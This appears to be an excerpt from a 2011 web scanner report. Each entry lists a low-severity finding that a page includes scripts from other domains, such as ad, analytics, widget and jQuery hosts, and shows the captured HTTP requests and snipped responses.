<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.134. http://www.cloudscan.me/2011/01/abstract-white-paper-relative.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /2011/01/abstract-white-paper-relative.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/abstract-white-paper-relative.html HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/search?q=white+paper
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.6.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:11:20 GMT
Date: Fri, 04 Feb 2011 16:11:20 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 114137

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/4011894546-comment_from_post_iframe.js"></script>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.135. http://www.cloudscan.me/2011/01/security-researcher-acknowledgments-for.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /2011/01/security-researcher-acknowledgments-for.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/security-researcher-acknowledgments-for.html HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/2010/12/ad-cdn-http-header-injection-cwe-113.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.8.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:11:47 GMT
Date: Fri, 04 Feb 2011 16:11:47 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 98086

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/4011894546-comment_from_post_iframe.js"></script>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.136. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /p/enterprise-exploit-coverage-by-hoyt-llc.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/enterprise-exploit-coverage-by-hoyt-llc.html HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/2011/01/security-researcher-acknowledgments-for.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.10.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:12:05 GMT
Date: Fri, 04 Feb 2011 16:12:05 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 91797

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.137. http://www.cloudscan.me/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?q=white+paper HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.blogger.com/navbar.g?targetBlogID=722867207364741287&blogName=Penetration+Testing+%7C+Hoyt+LLC&publishMode=PUBLISH_MODE_HOSTED&navbarType=BLUE&layoutType=LAYOUTS&searchRoot=http%3A%2F%2Fwww.cloudscan.me%2Fsearch&blogLocale=en&homepageUrl=http%3A%2F%2Fwww.cloudscan.me%2F
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.5.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:11:01 GMT
Date: Fri, 04 Feb 2011 16:11:01 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 77341

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.138. http://www.cloudscan.me/search/label/CWE-113  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search/label/CWE-113

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/label/CWE-113 HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.2.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:09:26 GMT
Date: Fri, 04 Feb 2011 16:09:26 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 271285

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.139. http://www.cloudscan.me/search/label/CWE-89  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search/label/CWE-89

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/label/CWE-89 HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.2.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:09:26 GMT
Date: Fri, 04 Feb 2011 16:09:26 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 234931

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.140. http://www.cloudscan.me/search/label/DORK  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search/label/DORK

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/label/DORK HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.1.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:09:14 GMT
Date: Fri, 04 Feb 2011 16:09:14 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 227949

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.141. http://www.cloudscan.me/search/label/SQL%20Injection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search/label/SQL%20Injection

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/label/SQL%20Injection HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.2.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:09:26 GMT
Date: Fri, 04 Feb 2011 16:09:26 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 247899

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.142. http://www.descargargratis.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.descargargratis.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.descargargratis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:53:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8c PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=735e937bfbeb0c58f8091116f1047d79; expires=Sun, 06-Feb-2011 21:53:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BS_www.descargargratis.com=735e937bfbeb0c58f8091116f1047d79; expires=Thu, 10-Feb-2011 21:53:09 GMT; path=/
Set-Cookie: BS_www.descargargratis.com=735e937bfbeb0c58f8091116f1047d79; expires=Thu, 10-Feb-2011 21:53:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 41154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Descargar pr
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://wnpcdn.com/min/g=frontend.css?2011020101" />
<script type="text/javascript" src="http://wnpcdn.com/min/g=frontend.js?2011012801"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

19.143. http://www.dhgate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhgate.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dhgate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: text/html
Content-Language: zh-CN
Date: Thu, 03 Feb 2011 21:48:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: vid=rBABeU1LIshUmnTRCKTHAg==; expires=Wed, 29-Jan-31 21:48:56 GMT; path=/
Content-Length: 56077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BOF DFP -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

19.144. http://www.dotnetnuke.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotnetnuke.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dotnetnuke.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=lmQw_336ywEkAAAAOTVjYTU2OWQtZWU3OS00M2M5LWJkYjUtZmVjY2Q2YzNjZWM00; expires=Thu, 14-Apr-2011 08:28:56 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=2cca12b0-8ff5-438d-8695-29e972b05a1e; expires=Thu, 03-Feb-2011 22:08:56 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=lmQw_336ywEkAAAAOTVjYTU2OWQtZWU3OS00M2M5LWJkYjUtZmVjY2Q2YzNjZWM00; expires=Thu, 14-Apr-2011 08:28:56 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=2cca12b0-8ff5-438d-8695-29e972b05a1e; expires=Thu, 03-Feb-2011 22:08:56 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:48:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<link id="APortals_25_" rel="stylesheet" type="text/css" href="/Portals/25/portal.css" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" ></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript" ></script>
...[SNIP]...

19.145. http://www.ericmmartin.com/projects/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 20:01:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34911


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<link rel='stylesheet' id='emm-v3-css' href='http://www.ericmmartin.com/wordpress/wp-content/themes/emm-v3/style.css?ver=1.0.16' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=1.4.3'></script>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=emartin24&#038;ver=3.0.2'></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201105.js" type="text/javascript"></script>
...[SNIP]...

19.146. http://www.everycarlisted.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everycarlisted.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.everycarlisted.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:19:36 GMT
Server: Unspecified
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: YPAID=b0fff94c2a3c423fe56d646beacd945b; expires=Fri, 04-Feb-2011 06:00:00 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://opengraphprotoc
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://static.ypautos.com/ecl/550/scripts/jquery-1.4.2.min.js" charset="utf-8"></script>
<script type="text/javascript" src="http://static.ypautos.com/ecl/550/scripts/jquery.tips.js" charset="utf-8"></script>
<script type="text/javascript" src="http://static.ypautos.com/ecl/550/scripts/jquery.validationEngine.merged.min.js"></script>
<script type="text/javascript" src="http://static.ypautos.com/ecl/550/scripts/AC_RunActiveContent.js"></script>
<script type="text/javascript" src="http://static.ypautos.com/ecl/550/scripts/ecl.min.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://static.ypautos.com/ecl/550/scripts/s_code.js"></script>
...[SNIP]...
